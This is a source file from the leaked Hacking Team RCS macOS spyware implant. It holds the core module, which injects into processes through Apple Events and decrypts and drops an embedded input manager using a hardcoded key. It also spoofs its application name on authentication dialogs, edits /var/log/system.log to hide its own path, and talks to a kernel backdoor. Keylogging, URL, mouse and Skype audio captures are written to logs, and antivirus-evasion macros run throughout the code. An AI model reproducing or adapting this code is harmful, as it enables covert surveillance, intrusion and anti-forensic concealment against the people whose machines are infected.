hackedteam/core-macos

View on GitHub
core/RCSMCore.m

Summary

Maintainability
Test Coverage
/*
 * RCSMac - Core
 *
 * Created by Alfredo 'revenge' Pesoli on 16/04/2009
 * Copyright (C) HT srl 2009. All rights reserved
 *
 */

#import <libgen.h>
#import <sys/ipc.h>
#import <sys/stat.h>
#import <sys/ioctl.h>
#import <sys/sysctl.h>
#import <notify.h>

#import <wchar.h>
#import <pwd.h>

#include <sys/mman.h>

#import <ScriptingBridge/ScriptingBridge.h>
#import <Carbon/Carbon.h>
#import <CommonCrypto/CommonDigest.h>
#import <CommonCrypto/CommonCryptor.h>

#import <Security/Authorization.h>
#import <Security/AuthorizationTags.h>

#include <IOKit/pwr_mgt/IOPMLib.h>
#include <IOKit/IOMessage.h>

#import "RCSMInputmanager_aes.h"

#import "speex.h"

#import "RCSMCommon.h"

#import "RCSMCore.h"
#import "RCSMGlobals.h"

#import "RCSMInfoManager.h"
#import "RCSMFileSystemManager.h"
#import "RCSMEncryption.h"
#import "RCSMLogManager.h"
#import "RCSMTaskManager.h"
#import "RCSMOsaxFiles.h"

#import "RCSMLogger.h"
#import "RCSMDebug.h"

#import "NSApplication+SystemVersion.h"
#import "NSMutableData+SHA1.h"
#import "NSData+SHA1.h"

#import "RCSMAVGarbage.h"

#define ICON_FILENAME  @"q45tyh"

//
// Old notification system
//
//#define kLOGOUT_INIT        CFSTR("com.apple.sessionmanager.allsessions.logoutInitiated")
//#define kRESTART_INIT       CFSTR("com.apple.sessionmanager.allsessions.restartInitiated")
//#define kSHUTDOWN_INIT      CFSTR("com.apple.sessionmanager.allsessions.shutdownInitiated")
//#define kLOGOUT_CONTINUED   CFSTR("com.apple.sessionmanager.allsessions.logoutContinued")
//#define kLOGOUT_CANCELLED   CFSTR("com.apple.sessionmanager.allsessions.logoutCancelled")
//#define kLW_QUIT_APPS       CFSTR("com.apple.sessionmanager.allsessions.logoutUserAppsTerminated")

//
// BSD notifications from loginwindow indicating shutdown (Leopard 10.5)
//

//   User clicked shutdown: may be aborted later
#define kLLWShutdowntInitiated       "com.apple.loginwindow.shutdownInitiated"

//   User clicked restart: may be aborted later
#define kLLWRestartInitiated         "com.apple.loginwindow.restartinitiated"

//   A previously initiated shutdown, restart, or logout, has been cancelled.
#define kLLWLogoutCancelled          "com.apple.loginwindow.logoutcancelled"

//   A previously initiated shutdown, restart, or logout has succeeded, and is
//   no longer abortable by anyone. Point of no return!
#define kLLWLogoutPointOfNoReturn    "com.apple.loginwindow.logoutNoReturn"

//
// BSD notifications from loginwindow indicating shutdown (Snow Leopard 10.6)
//

//   User clicked shutdown: may be aborted later
#define kSLLWShutdowntInitiated       "com.apple.system.loginwindow.shutdownInitiated"

//   User clicked restart: may be aborted later
#define kSLLWRestartInitiated         "com.apple.system.loginwindow.restartinitiated"

//   A previously initiated shutdown, restart, or logout, has been cancelled.
#define kSLLWLogoutCancelled          "com.apple.system.loginwindow.logoutcancelled"

//   A previously initiated shutdown, restart, or logout has succeeded, and is
//   no longer abortable by anyone. Point of no return!
#define kSLLWLogoutPointOfNoReturn    "com.apple.system.loginwindow.logoutNoReturn"

NSString *appBListArray[] = { @"mdworker",
    @"SystemUIServer",
    @"Dock",
    @"launchd",
    @"loginwindow",
    @"UserEventAgent",
    NULL};


static int gLWShutdownNotificationToken               = 0;
static int gLWRestartNotificationToken                = 0;
static int gLWLogoutCancelNotificationToken           = 0;
static int gLWLogoutPointOfNoReturnNotificationToken  = 0;

static BOOL gHasVoipInFinishedRecording;
static BOOL gHasVoipOutFinishedRecording;

// backdoor descriptor for our own device (kext communication)
static int gBackdoorFD = 0;

io_registry_entry_t getRootDomain(void)
{
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    static io_registry_entry_t gRoot = MACH_PORT_NULL;
    
    if (MACH_PORT_NULL == gRoot)
        gRoot = IORegistryEntryFromPath(kIOMasterPortDefault,
                                        kIOPowerPlane ":/IOPowerConnection/IOPMrootDomain");
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    return gRoot;
}

//IOReturn _setRootDomainProperty(CFStringRef                 key,
//                                CFTypeRef                   val)
//{
//  return IORegistryEntrySetCFProperty(getRootDomain(), key, val);
//}

void lionSendEventToPid(pid_t pidP)
{
    AEEventID eventID = 'open';
    int rUid = getuid();
    
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    SBApplication *app = [SBApplication applicationWithProcessIdentifier: pidP];
    
#ifdef DEBUG_CORE
    infoLog(@"send event to application pid %d", pidP);
#endif
    
#ifdef DEBUG_CORE
    infoLog(@"enter critical session [euid/uid %d/%d]",
            geteuid(), getuid());
#endif
    
    // trimming process u&g
    seteuid(rUid);
    
    [app setTimeout:1];
    
    [app setSendMode: kAENoReply | kAENeverInteract | kAEDontRecord];
    [app sendEvent: kASAppleScriptSuite
                id: kGetAEUT
        parameters: 0];
    
#ifdef DEBUG_CORE
    infoLog(@"send kASAppleScriptSuite [%d]", pidP);
#endif
    
    sleep(1);
    
    [app setTimeout:1];
    
    [app setSendMode: kAENoReply | kAENeverInteract | kAEDontRecord];
    
    NSNumber *pid = [NSNumber numberWithInt: getpid()];
    
    id injectReply = [app sendEvent: 'OPNe'
                                 id: eventID
                         parameters: 'pido', pid, 0];
    
#ifdef DEBUG_CORE
    infoLog(@"exit critical session [euid/uid %d/%d]",
            geteuid(), getuid());
#endif
    
    if (injectReply != nil)
    {
#ifdef DEBUG_CORE
        infoLog(@"unexpected injectReply: %@ [%d]", injectReply, pidP);
#endif
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"injection done [%d]", pidP);
#endif
    }
    
    [pool release];
}

//
// Shutdown handler
//
static void computerWillShutdown(CFMachPortRef port,
                                 void *msg,
                                 CFIndex size,
                                 void *info)
{
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    mach_msg_header_t *header = (mach_msg_header_t *)msg;
    static bool shouldShutdown = false;
    
    if (header->msgh_id == gLWShutdownNotificationToken)
    {
        // Loginwindow put a shutdown confirm panel up on screen
        // The user has not necessarily even clicked on it yet
#ifdef DEBUG_CORE
        infoLog(@"Request for Shutdown");
#endif
        shouldShutdown = true;
    }
    else if (header->msgh_id == gLWRestartNotificationToken)
    {
        // Loginwindow put a restart confirm panel up on screen
        // The user has not necessarily even clicked on it yet
#ifdef DEBUG_CORE
        infoLog(@"Request for Restart");
#endif
        shouldShutdown = true;
    }
    else if (header->msgh_id == gLWLogoutCancelNotificationToken)
    {
#ifdef DEBUG_CORE
        infoLog(@"Shutdown operation cancelled");
#endif
        // Whatever shutdown, restart, or logout that was in progress has been cancelled.
        shouldShutdown = false;
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
    }
    else if (shouldShutdown
             && (header->msgh_id == gLWLogoutPointOfNoReturnNotificationToken))
    {
        // Whatever shutdown or restart that was in progress has succeeded.
        // All apps are quit, there's no more user input required. We will
        // hereby disable sleep for the remainder of time spent shutting down
        // this machine.
        //_setRootDomainProperty(CFSTR("System Shutdown"), kCFBooleanTrue);
#ifdef DEBUG_CORE
        infoLog(@"Ok we're really shutting down NOW");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        const char *userName = [NSUserName() UTF8String];
        ioctl(gBackdoorFD, MCHOOK_UNREGISTER, userName);
    }
}

void decryptAndSaveIm()
{
  NSData *imData = [NSData dataWithBytes:_tmp_inputmanager_buff_des
                                  length:_tmp_inputmanager_buff_des_len];
  
  NSString *imPath = [NSString stringWithFormat:@"%@/%@",
                      [[NSBundle mainBundle] bundlePath], gInputManagerName];
  
  char *outbuffer = (char*)malloc([imData length] + kCCBlockSizeAES128);
  
  size_t numBytesEncrypted = 0, outLen = [imData length] + kCCBlockSizeAES128;
  
  CCCryptorStatus result;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  char *key[kCCKeySizeAES128+1];
  
  bzero(key, kCCKeySizeAES128+1);
  int *_key =(int*)key;
  *_key = 0x60504010;
  
  result = CCCrypt(kCCDecrypt,
                   kCCAlgorithmAES128,
                   kCCOptionPKCS7Padding,
                   key,
                   kCCKeySizeAES128,
                   NULL,
                   [imData bytes], [imData length],
                   outbuffer, outLen,
                   &numBytesEncrypted);
  
  NSData *imDataToWrite = [NSData dataWithBytes:outbuffer length:numBytesEncrypted];
  
  if (result == kCCSuccess)
  {
    [imDataToWrite writeToFile:imPath atomically:YES];
  }
}

#pragma mark -
#pragma mark Private Interface
#pragma mark -

@interface __m_MCore (hidden)

- (void)_renameBackdoorAndRelaunch;

//
// Renames entries in /var/log/system.log which contains our backdoor name
//
- (void)_checkSystemLog;

//
// Main thread
//
- (void)_communicateWithAgents;

//
//
// Speex encode and write to logs
// shouldn't be here but needs access to logManager
//
- (BOOL)_speexEncodeBuffer: (char *)source
                  withSize: (u_int)audioChunkSize
                  channels: (u_int)channels
                  forInput: (BOOL)isInput;

// Guess all the required names before the backdoor starts
//
- (void)_guessNames;

//
// Build the internal app folders and plist files needed to execute the backdoor
//
- (void)_resizeSharedMemoryWindow;

- (void)_createInternalFilesAndFolders;

- (void)_checkForOthers;

- (BOOL)_createAndInitSharedMemory;

- (BOOL)_SLIEscalation;

- (BOOL)_dropInputManager;

- (BOOL)_UISpoof;

- (void)_dropOsaxBundle;

- (void)_solveKernelSymbolsForKext;

- (void)_registerForShutdownNotifications;

//- (void)_dropXPCBundle;

@end

#pragma mark -
#pragma mark Private Implementation
#pragma mark -

@implementation __m_MCore (hidden)

- (void)_renameBackdoorAndRelaunch
{
    // AV evasion: only on release build
    AV_GARBAGE_000
    
#ifdef DEBUG_CORE
    warnLog(@"Spoofing and relaunching ourself, appName is %@", mApplicationName);
#endif
    
    //
    // Renaming the application executable in order to spoof the UI Application
    // name which will appear on the Authentication dialog
    //
    [[NSFileManager defaultManager] copyItemAtPath: [[NSBundle mainBundle] executablePath]
                                            toPath: mSpoofedName
                                             error: nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    //
    // Executing ourself with the new executable name and exit
    //
    [gUtil executeTask: mSpoofedName
         withArguments: nil
          waitUntilEnd: NO];
    
#ifdef DEBUG_CORE
    warnLog(@"Exiting after having launched (%@)", mSpoofedName);
#endif
    exit(0);
}

- (int)_createAdvisoryLock: (NSString *)lockFile
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    NSError *error;
    BOOL success = [@"" writeToFile: lockFile
                         atomically: NO
                           encoding: NSUnicodeStringEncoding
                              error: &error];
    
    //
    // Here we might get a privilege error in case the lock is on
    //
    if (success == YES)
    {
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        NSFileHandle *lockFileHandle = [NSFileHandle fileHandleForReadingAtPath:
                                        lockFile];
#ifdef DEBUG_CORE
        infoLog(@"Lock file created succesfully");
#endif
        
        if (lockFileHandle)
        {
            int fd = [lockFileHandle fileDescriptor];
            
            // AV evasion: only on release build
            AV_GARBAGE_003
            
            if (flock(fd, LOCK_EX | LOCK_NB) != 0)
            {
#ifdef DEBUG_CORE
                errorLog(@"Failed to acquire advisory lock");
#endif
                
                return -1;
            }
            else
            {
#ifdef DEBUG_CORE
                infoLog(@"Advisory lock acquired correctly");
#endif
                
                return fd;
            }
        }
        else
        {
            return -1;
        }
    }
    else
    {
#ifdef DEBUG_CORE
        errorLog(@"%@", error);
#endif
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    return -1;
}

- (void)_checkSystemLog
{
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    NSAutoreleasePool *outerPool  = [[NSAutoreleasePool alloc] init];
    NSMutableString *fileData     = [[NSMutableString alloc]
                                     initWithContentsOfFile: @"/var/log/system.log"];
    NSString *backdoorPath        = [[NSBundle mainBundle] executablePath];
    
    NSString *backdoorPath2       = [NSString stringWithFormat: @"%@",
                                     [[[NSBundle mainBundle] bundlePath]
                                      stringByAppendingPathComponent: @"System Preferences"]];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    u_int size = 400;
    u_int startOfft = ([fileData length] > size)
    ? [fileData length] - size
    : [fileData length];
    
    u_int len = ([fileData length] > size)
    ? size
    : [fileData length];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    [fileData replaceOccurrencesOfString: backdoorPath
                              withString: @"/Applications/System Preferences.app/Contents/MacOS/System Preferences"
                                 options: NSCaseInsensitiveSearch
                                   range: NSMakeRange(startOfft, len)];
    
    [fileData replaceOccurrencesOfString: backdoorPath2
                              withString: @"/Applications/System Preferences.app/Contents/MacOS/System Preferences"
                                 options: NSCaseInsensitiveSearch
                                   range: NSMakeRange(startOfft, len)];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    [fileData writeToFile: @"/var/log/system.log"
               atomically: YES
                 encoding: NSUTF8StringEncoding
                    error: nil];
    
    NSArray *_tempArguments = [[NSArray alloc] initWithObjects:
                               @"root:admin",
                               @"/var/log/system.log",
                               nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    [gUtil executeTask: @"/usr/sbin/chown"
         withArguments: _tempArguments
          waitUntilEnd: YES];
    
    [_tempArguments release];
    [fileData release];
    [outerPool drain];
}

- (BOOL)_speexEncodeBuffer: (char *)source
                  withSize: (u_int)audioChunkSize
                  channels: (u_int)channels
                  forInput: (BOOL)isInput
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
#define SPEEX_MODE_UWB        2
#define SINGLE_LPCM_UNIT_SIZE 4 // sizeof(float)
    // Single lpcm unit already casted to SInt16
    SInt16 *bitSample;
    // Speex state
    void *speexState;
    
    SInt16 *inputBuffer;
    SInt16 *floatToSInt16Buffer;
    
    char *outputBuffer;
    char *ptrSource;
    char *ptrSInt16Buffer;
    
    SpeexBits speexBits;
    
    u_int frameSize       = 0;
    u_int i               = 0;
    u_int j               = 0;
    u_int bytesWritten    = 0;
    
    // Harcoded values for testing
    u_int complexity      = 1;
    u_int quality         = (gSkypeQuality != 0) ? gSkypeQuality : 5;
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    __m_MLogManager *_logManager = [__m_MLogManager sharedInstance];
    
    // Create a new wide mode encoder
    speexState = speex_encoder_init(speex_lib_get_mode(SPEEX_MODE_UWB));
    
    // Set quality and complexity
    speex_encoder_ctl(speexState, SPEEX_SET_QUALITY, &quality);
    speex_encoder_ctl(speexState, SPEEX_SET_COMPLEXITY, &complexity);
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    speex_bits_init(&speexBits);
    
    // Get frame size for given quality and compression factor
    speex_encoder_ctl(speexState, SPEEX_GET_FRAME_SIZE, &frameSize);
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    if (!frameSize)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error while getting frameSize from speex");
#endif
        
        speex_encoder_destroy(speexState);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        speex_bits_destroy(&speexBits);
        
        return FALSE;
    }
    
#ifdef DEBUG_CORE
    infoLog(@"frameSize: %d", frameSize);
#endif
    
    //
    // Allocate the output buffer including the first dword (bufferSize)
    //
    if (!(outputBuffer = (char *)malloc(frameSize * SINGLE_LPCM_UNIT_SIZE + sizeof(u_int))))
    {
#ifdef DEBUG_CORE
        errorLog(@"Error while allocating output buffer");
#endif
        
        speex_encoder_destroy(speexState);
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        speex_bits_destroy(&speexBits);
        
        return FALSE;
    }
    
    //
    // Allocate the input buffer
    //
    if (!(inputBuffer = (SInt16 *)malloc(frameSize * sizeof(SInt16))))
    {
#ifdef DEBUG_CORE
        errorLog(@"Error while allocating input float buffer");
#endif
        
        free(outputBuffer);
        speex_encoder_destroy(speexState);
        speex_bits_destroy(&speexBits);
        
        return FALSE;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    //
    // Allocate the conversion buffer
    //
    if (!(floatToSInt16Buffer = (SInt16 *)malloc(audioChunkSize)))
    {
#ifdef DEBUG_CORE
        errorLog(@"Failed to allocate floatToSInt16Buffer");
#endif
        free(outputBuffer);
        free(inputBuffer);
        
        speex_encoder_destroy(speexState);
        
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        speex_bits_destroy(&speexBits);
        
        return FALSE;
    }
    
    //
    // Make the conversion from Float32 to SInt16
    //
    float *fPcms = (float *)source;
    for (i = 0; i < audioChunkSize / sizeof(float); i++)
    {
        float temp = (fPcms[i] * (32767.0f));
        SInt16 value = lrintf(temp);
        floatToSInt16Buffer[j++] = value;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    ptrSInt16Buffer = (char *)floatToSInt16Buffer;
#ifdef DEBUG_SPEEX
    verboseLog(@"Audio Chunk SIZE: %d", audioChunkSize);
    
    // Write a Wav
    NSMutableData *headerData       = [[NSMutableData alloc] initWithLength: sizeof(waveHeader)];
    NSMutableData *audioData        = [[NSMutableData alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    waveHeader *waveFileHeader      = (waveHeader *)[headerData bytes];
    
    NSString *riff    = @"RIFF";
    NSString *waveFmt = @"WAVEfmt ";
    NSString *data    = @"data";
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    int audioSize = audioChunkSize / 2;
    int fileSize = audioSize + 44; // size of header + strings
    int fmtSize  = 16;
    
    waveFileHeader->formatTag       = 1;
    waveFileHeader->nChannels       = 2;
    //waveFileHeader->nSamplesPerSec  = 48000;
    waveFileHeader->nSamplesPerSec  = 44100;
    waveFileHeader->bitsPerSample   = 16;
    waveFileHeader->blockAlign      = (waveFileHeader->bitsPerSample / 8) * waveFileHeader->nChannels;
    waveFileHeader->nAvgBytesPerSec = waveFileHeader->nSamplesPerSec * waveFileHeader->blockAlign;
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    //waveFileHeader->blockAlign      = waveFileHeader->nAvgBytesPerSec = (waveFileHeader->bitsPerSample / 8) * waveFileHeader->nChannels;
    
    [audioData appendData: [riff dataUsingEncoding: NSUTF8StringEncoding]];
    [audioData appendBytes: &fileSize
                    length: sizeof(int)];
    [audioData appendData: [waveFmt dataUsingEncoding: NSUTF8StringEncoding]];
    
    [audioData appendBytes: &fmtSize
                    length: sizeof(int)];
    [audioData appendData: headerData];
    [audioData appendData: [data dataUsingEncoding: NSUTF8StringEncoding]];
    [audioData appendBytes: &audioSize
                    length: sizeof(int)];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    // Append audio chunk
    [audioData appendBytes: floatToSInt16Buffer
                    length: audioChunkSize / 2];
    
    time_t t;
    time(&t);
    
    NSString *fileName = [[NSString alloc] initWithFormat: @"/tmp/tempAudio-%d.wav", t];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    [audioData writeToFile: fileName
                atomically: YES];
    
    [headerData release];
    [audioData release];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    NSMutableData *fileData = [[NSMutableData alloc] init];
#endif
    
    //
    // We skip one channel by multiplying per channels inside the for condition
    // and inside the inner for with bitSample
    //
    for (ptrSource = ptrSInt16Buffer;
         ptrSource + (frameSize  * (SINGLE_LPCM_UNIT_SIZE / 2) * channels) <= ptrSInt16Buffer + (audioChunkSize / 2);
         ptrSource += (frameSize * (SINGLE_LPCM_UNIT_SIZE / 2) * channels))
    {
        bitSample = (SInt16 *)ptrSource;
        
        for (i = 0; i < frameSize; i ++)
        {
            // Just to avoid clipping on GSM with speex
            // 1.2 db line loss
            inputBuffer[i] =  bitSample[i * channels] - (bitSample[i * channels] / 4);
        }
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        speex_bits_reset(&speexBits);
        speex_encode_int(speexState, inputBuffer, &speexBits);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        // Encode and store the result in the outputBuffer + first dword (length)
        bytesWritten = speex_bits_write(&speexBits,
                                        (char *)(outputBuffer + sizeof(u_int)),
                                        frameSize * SINGLE_LPCM_UNIT_SIZE);
        
        // If bytesWritten is greater than our condition, something wrong happened
        if (bytesWritten > (frameSize * SINGLE_LPCM_UNIT_SIZE))
            continue;
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        // Store the audioChunk size in the first dword of outputBuffer
        memcpy(outputBuffer, &bytesWritten, sizeof(u_int));
        
        if (isInput == YES)
        {
            NSMutableData *tempData = [[NSMutableData alloc] initWithBytes: outputBuffer
                                                                    length: bytesWritten + sizeof(u_int)];
#ifdef DEBUG_SPEEX
            [fileData appendData: tempData];
#endif
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            [_logManager writeDataToLog: tempData
                               forAgent: AGENT_VOIP// + VOIP_SKYPE
                              withLogID: SKYPE_CHANNEL_INPUT];
            
            [tempData release];
        }
        else
        {
            NSMutableData *tempData = [[NSMutableData alloc] initWithBytes: outputBuffer
                                                                    length: bytesWritten + sizeof(u_int)];
#ifdef DEBUG_SPEEX
            [fileData appendData: tempData];
#endif
            
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            [_logManager writeDataToLog: tempData
                               forAgent: AGENT_VOIP// + VOIP_SKYPE
                              withLogID: SKYPE_CHANNEL_OUTPUT];
            
            // AV evasion: only on release build
            AV_GARBAGE_005
            
            [tempData release];
        }
    }
    
#ifdef DEBUG_SPEEX
    time_t ut;
    time(&ut);
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSString *outFile = [[NSString alloc] initWithFormat: @"/tmp/speexEncoded-%d.wav", ut];
    
    [fileData writeToFile: outFile
               atomically: YES];
    
    [outFile release];
    [fileData release];
#endif
    
    free(inputBuffer);
    free(outputBuffer);
    free(floatToSInt16Buffer);
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    speex_encoder_destroy(speexState);
    speex_bits_destroy(&speexBits);
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    return TRUE;
}

- (void)_communicateWithAgents
{
    //int agentIndex = 0;
    //int agentsCount = 8;
#ifdef DEBUG_CORE
    int x = 0;
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    shMemoryLog *shMemLog;
    __m_MLogManager *_logManager   = [__m_MLogManager sharedInstance];
    __m_MTaskManager *_taskManager = [__m_MTaskManager sharedInstance];
    
#ifdef DEBUG_CORE
    infoLog(@"Start receiving log from agents");
#endif
    
    NSMutableData *voipInputData        = nil;
    NSMutableData *voipOutputData       = nil;
    
    gHasVoipInFinishedRecording         = NO;
    gHasVoipOutFinishedRecording        = NO;
    
    NSString *localFlag = nil;
    
    [gControlFlagLock lock];
    localFlag = [_taskManager getControlFlag];
    [gControlFlagLock unlock];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    while ([localFlag isEqualToString: @"RUNNING"])
    {
        NSAutoreleasePool *innerPool  = [[NSAutoreleasePool alloc] init];
        
        [gControlFlagLock lock];
        localFlag = [_taskManager getControlFlag];
        [gControlFlagLock unlock];
        
        NSMutableData *logData        = nil;
        NSMutableData *readData       = nil;
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        readData = [gSharedMemoryLogging readMemoryFromComponent: COMP_CORE
                                                        forAgent: 0
                                                 withCommandType: CM_CREATE_LOG_HEADER
                    | CM_LOG_DATA
                    | CM_CLOSE_LOG
                    | CM_CLOSE_LOG_WITH_HEADER];
        
        if (readData != nil)
        {
            shMemLog = (shMemoryLog *)[readData bytes];
            
#ifdef DEBUG_CORE
            verboseLog(@"Logging shMemLog->agentID = 0x%x", shMemLog->agentID);
#endif
            // AV evasion: only on release build
            AV_GARBAGE_004
            
            switch (shMemLog->agentID)
            {
                case AGENT_URL:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_006
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_URL
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        infoLog(@"URL logged correctly");
#endif
                    }
                    
                    break;
                }
                case AGENT_KEYLOG:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_007
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_KEYLOG
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        verboseLog(@"Log header agentID %x, status %x command size %d keylog %S",
                                   shMemLog->agentID,
                                   shMemLog->status,
                                   shMemLog->commandDataSize,
                                   shMemLog->commandData);
                        verboseLog(@"header data size %d", sizeof(shMemoryLog));
#endif
                    }
                    
                    break;
                }
                case AGENT_APPLICATION:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_007
                    
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    if ([_logManager writeDataToLog: logData
                                           forAgent: AGENT_APPLICATION
                                          withLogID: 0] == TRUE)
                    {
#ifdef DEBUG_CORE
                        verboseLog(@"Log header agentID %x, status %x command size %d",
                                   shMemLog->agentID,
                                   shMemLog->status,
                                   shMemLog->commandDataSize);
                        verboseLog(@"header data size %lu", sizeof(shMemoryLog));
#endif
                    }
                    
                    break;
                }
                case AGENT_MOUSE:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_008
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Logs from mouse");
#endif
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    mouseAdditionalStruct *_mouseHeader = (mouseAdditionalStruct *)[logData bytes];
                    int additionalSize = sizeof(mouseAdditionalStruct)
                    + _mouseHeader->processNameLength
                    + _mouseHeader->windowNameLength;
                    
                    NSMutableData *mouseAdditionalHeader = nil;
                    NSMutableData *mouseData = nil;
                    
                    @try
                    {
                        mouseAdditionalHeader = [[NSMutableData alloc] initWithData:
                                                 [logData subdataWithRange: NSMakeRange(0, additionalSize)]];
                        
                        mouseData = [[NSMutableData alloc] initWithData: [logData subdataWithRange:
                                                                          NSMakeRange([mouseAdditionalHeader length],
                                                                                      [logData length] - [mouseAdditionalHeader length])]];
#ifdef DEBUG_CORE
                        infoLog(@"additional size: %d", additionalSize);
                        infoLog(@"mouseadd header len: %d", [mouseAdditionalHeader length]);
                        infoLog(@"logData len: %d", [logData length]);
#endif
                    }
                    @catch (NSException *e)
                    {
#ifdef DEBUG_CORE
                        errorLog(@"exception on mouse header makerange (%@)", [e reason]);
#endif
                        [mouseAdditionalHeader release];
                        [mouseData release];
                        continue;
                    }
                    
                    //
                    // Create log here since we need to pass anAgentHeader as the
                    // additional file header
                    //
                    if ([_logManager createLog: AGENT_MOUSE
                                   agentHeader: mouseAdditionalHeader
                                     withLogID: 0] == TRUE)
                    {
                        if ([_logManager writeDataToLog: mouseData
                                               forAgent: AGENT_MOUSE
                                              withLogID: 0] == TRUE)
                        {
#ifdef DEBUG_CORE
                            infoLog(@"Mouse click logged correctly");
#endif
                        }
                        else
                        {
#ifdef DEBUG_CORE
                            errorLog(@"Error while writing data to AGENT_MOUSE log");
#endif
                        }
                    }
                    else
                    {
#ifdef DEBUG_CORE
                        errorLog(@"Error while creating AGENT_MOUSE log");
#endif
                    }
                    
                    [_logManager closeActiveLog: AGENT_MOUSE
                                      withLogID: 0];
                    
                    [mouseAdditionalHeader release];
                    [mouseData release];
                    
                    break;
                }
                case AGENT_VOIP:
                {
                    // AV evasion: only on release build
                    AV_GARBAGE_009
                    
#ifdef DEBUG_CORE
                    verboseLog(@"Logs from Voip Agent");
#endif
                    //
                    // Protocol looks like
                    // 1- Receive the CM_LOG_DATA^x
                    // 2- Receive the CM_CLOSE_LOG_WITH_HEADER
                    //
                    logData = [[NSMutableData alloc] initWithBytes: shMemLog->commandData
                                                            length: shMemLog->commandDataSize];
                    
                    switch (shMemLog->commandType)
                    {
                        case CM_LOG_DATA:
                        {
#ifdef DEBUG_CORE
                            verboseLog(@"[ii] Received audio data from Skype");
#endif
                            
                            if (shMemLog->flag == SKYPE_CHANNEL_INPUT)
                            {
                                //if (gHasVoipInFinishedRecording == NO)
                                //{
                                if (voipInputData == nil)
                                {
                                    voipInputData = [[NSMutableData alloc] init];
                                }
                                
                                [voipInputData appendData: logData];
                                //}
                            }
                            else if (shMemLog->flag == SKYPE_CHANNEL_OUTPUT)
                            {
                                //if (gHasVoipOutFinishedRecording == NO)
                                //{
                                if (voipOutputData == nil)
                                {
                                    voipOutputData = [[NSMutableData alloc] init];
                                }
                                
                                [voipOutputData appendData: logData];
                                //}
                            }
                            
                            break;
                        }
                        case CM_CLOSE_LOG_WITH_HEADER:
                        {
#ifdef DEBUG_CORE
                            infoLog(@"[ii] Received a close log command from skype");
#endif
                            
                            NSData *_localPeer    = nil;
                            NSData *_remotePeer   = nil;
                            NSString *localPeer   = nil;
                            NSString *remotePeer  = nil;
                            
                            int32_t hiStopTime    = 0;
                            int32_t loStopTime    = 0;
                            
                            if ((shMemLog->flag & SKYPE_CHANNEL_INPUT) == SKYPE_CHANNEL_INPUT)
                            {
#ifdef DEBUG_CORE
                                infoLog(@"[ii] Voip - Closing input channel");
                                infoLog(@"[ii] audioChunk size: %d", [voipInputData length]);
#endif
                                
                                voipAdditionalStruct *_voipHeader = (voipAdditionalStruct *)[logData bytes];
                                int additionalSize = sizeof(voipAdditionalStruct)
                                + _voipHeader->localPeerLength
                                + _voipHeader->remotePeerLength;
                                
                                _localPeer = [[NSData alloc] initWithData:
                                              [logData subdataWithRange:
                                               NSMakeRange(sizeof(voipAdditionalStruct),
                                                           _voipHeader->localPeerLength)]];
                                
                                _remotePeer = [[NSData alloc] initWithData:
                                               [logData subdataWithRange:
                                                NSMakeRange(sizeof(voipAdditionalStruct)
                                                            + _voipHeader->localPeerLength,
                                                            _voipHeader->remotePeerLength)]];
                                
